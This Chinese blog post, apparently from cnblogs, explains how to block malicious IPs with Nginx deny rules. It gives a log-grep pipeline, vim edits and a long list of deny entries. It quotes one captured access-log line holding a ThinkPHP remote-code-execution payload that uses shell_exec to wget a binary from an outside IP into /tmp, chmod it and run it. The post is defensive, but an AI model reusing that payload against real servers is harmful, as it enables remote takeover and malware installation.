  • 使用 Nginx 阻止恶意 IP 访问

    找到具有明显特征的访问记录,比如:

    156.203.12.198 -[01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1" 400 166 "-" "Ouija_x.86/2.0" "-"

    也许是某个开源框架的漏洞:执行请求参数里指定的方法,达到下载指定文件然后执行的目的。由于危险性,所以 shell_exec 这类函数默认在 php.ini 是禁用的(建议核对 php.ini 的 disable_functions 是否确实包含这些函数,不要只凭默认值)。

    匹配特征找出不重复的 IP,写入文件:

    $ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips

    编辑一个 nginx 配置,加入到 location 访问中:

    $ cat blockips > /etc/nginx/conf.d/blockips.conf


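    location / {
        # The deny list is kept in its own file so it can be regenerated from
        # the access log without editing this block. Each line in that file is
        # "deny <ip>;". The include directive itself must end with ";" or
        # "nginx -t" fails with "directive include is not terminated by ;".
        include /etc/nginx/conf.d/blockips.conf;
        xxxx;
    }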

    用 vim 打开 blockips.conf,在命令模式执行下面两条替换:行首加 "deny ",行尾加 ";"

    %s/^/deny /g
    %s/$/;/g

    重载 nginx 后,这些 IP 的访问会返回 403。注意 deny 匹配的是 nginx 看到的客户端地址($remote_addr):若 nginx 前面还有反向代理或负载均衡(Docker 端口映射也可能如此),需先通过 realip 模块(set_real_ip_from / real_ip_header)还原真实 IP,否则规则匹配不到或会误封代理地址。

    # 宿主机模式
    $ nginx -s reload
    # Docker模式
    $ docker-compose restart nginx

    附一份当时匹配到的恶意访问 IP(此类列表会过期,建议定期复核,避免长期误封已被重新分配的动态地址):

    deny 156.194.121.215;
    deny 156.195.107.210;
    deny 156.195.39.140;
    deny 156.195.45.250;
    deny 156.196.146.114;
    deny 156.196.17.47;
    deny 156.196.229.206;
    deny 156.196.6.26;
    deny 156.198.62.131;
    deny 156.200.245.40;
    deny 156.201.18.181;
    deny 156.202.190.62;
    deny 156.202.251.75;
    deny 156.202.76.2;
    deny 156.202.84.179;
    deny 156.203.12.198;
    deny 156.203.210.142;
    deny 156.203.244.51;
    deny 156.203.7.75;
    deny 156.205.251.198;
    deny 156.205.81.35;
    deny 156.206.136.3;
    deny 156.206.182.152;
    deny 156.206.187.73;
    deny 156.206.231.65;
    deny 156.207.242.8;
    deny 156.208.42.167;
    deny 156.209.137.91;
    deny 156.209.40.94;
    deny 156.212.251.36;
    deny 156.214.142.160;
    deny 156.214.43.68;
    deny 156.217.6.172;
    deny 156.217.9.164;
    deny 156.218.133.186;
    deny 156.218.246.73;
    deny 156.219.214.185;
    deny 156.221.182.18;
    deny 156.222.20.232;
    deny 157.230.121.160;
    deny 167.172.104.251;
    deny 192.64.86.141;
    deny 197.33.213.164;
    deny 197.33.38.103;
    deny 197.34.0.63;
    deny 197.35.49.18;
    deny 197.36.233.108;
    deny 197.36.33.241;
    deny 197.36.4.226;
    deny 197.36.60.220;
    deny 197.40.152.66;
    deny 197.41.192.255;
    deny 197.41.76.25;
    deny 197.42.153.234;
    deny 197.43.203.16;
    deny 197.46.143.130;
    deny 197.46.88.69;
    deny 197.52.120.153;
    deny 197.52.86.59;
    deny 197.53.154.219;
    deny 197.57.10.160;
    deny 197.58.107.10;
    deny 197.61.10.30;
    deny 197.61.18.238;
    deny 197.61.62.151;
    deny 197.62.106.69;
    deny 197.63.152.246;
    deny 41.232.65.205;
    deny 41.233.204.74;
    deny 41.235.104.130;
    deny 41.236.148.6;
    deny 41.236.3.171;
    deny 41.238.205.186;
    deny 41.238.34.214;
    deny 41.35.143.95;
    deny 41.36.168.29;
    deny 41.36.196.47;
    deny 41.36.20.93;
    deny 41.36.221.70;
    deny 41.40.31.77;
    deny 41.42.219.201;
    deny 41.42.59.4;
    deny 41.43.34.248;
    deny 41.44.120.131;
    deny 41.45.98.34;
    deny 41.46.62.42;
    deny 41.47.75.136;
    deny 80.10.22.62;
    deny 95.14.156.128;
    deny 156.196.181.71;
    deny 156.196.191.37;
    deny 156.196.197.156;
    deny 156.196.3.62;
    deny 156.197.229.125;
    deny 156.201.133.105;
    deny 156.201.98.17;
    deny 156.202.112.54;
    deny 156.202.152.246;
    deny 156.202.31.234;
    deny 156.202.39.255;
    deny 156.203.54.61;
    deny 156.203.96.174;
    deny 156.204.165.223;
    deny 156.205.169.68;
    deny 156.206.214.19;
    deny 156.208.49.5;
    deny 156.208.51.140;
    deny 156.209.187.210;
    deny 156.209.35.200;
    deny 156.212.44.77;
    deny 156.213.35.145;
    deny 156.216.156.144;
    deny 156.218.136.219;
    deny 156.219.45.190;
    deny 156.220.186.189;
    deny 156.221.230.75;
    deny 156.221.8.69;
    deny 182.64.156.46;
    deny 197.33.205.142;
    deny 197.33.214.152;
    deny 197.33.99.150;
    deny 197.34.177.145;
    deny 197.35.113.116;
    deny 197.35.85.109;
    deny 197.36.186.126;
    deny 197.36.19.18;
    deny 197.37.180.73;
    deny 197.38.244.62;
    deny 197.40.184.150;
    deny 197.40.238.169;
    deny 197.41.112.15;
    deny 197.41.178.87;
    deny 197.41.86.1;
    deny 197.43.220.39;
    deny 197.45.9.234;
    deny 197.46.71.54;
    deny 197.47.108.224;
    deny 197.47.221.54;
    deny 197.52.165.67;
    deny 197.54.42.198;
    deny 197.56.28.28;
    deny 197.56.59.108;
    deny 197.57.167.86;
    deny 197.57.219.86;
    deny 197.59.221.148;
    deny 197.61.186.6;
    deny 197.61.85.58;
    deny 197.62.227.36;
    deny 197.63.13.29;
    deny 197.63.205.232;
    deny 41.232.17.135;
    deny 41.232.27.153;
    deny 41.234.133.17;
    deny 41.235.102.192;
    deny 41.235.244.63;
    deny 41.236.223.4;
    deny 41.236.56.8;
    deny 41.237.33.100;
    deny 41.239.135.65;
    deny 41.239.77.234;
    deny 41.42.35.168;
    deny 41.42.59.130;
    deny 41.45.30.236;
    deny 41.46.236.128;
    deny 41.46.255.174;
    deny 141.98.80.117;
    deny 141.98.80.42;
    deny 185.153.196.48;
    deny 185.153.198.163;
    deny 185.153.199.3;
    deny 185.156.177.10;
    deny 193.106.31.202;
    deny 193.188.22.123;
    deny 193.188.22.187;
    deny 193.188.22.234;
    deny 193.188.22.76;
    deny 193.188.23.25;
    deny 39.107.142.5;
    deny 41.216.186.89;
    deny 45.141.86.144;
    deny 46.161.27.112;

    Link:https://www.cnblogs.com/farwish/p/12080630.html

  • 原文地址:https://www.cnblogs.com/farwish/p/12080630.html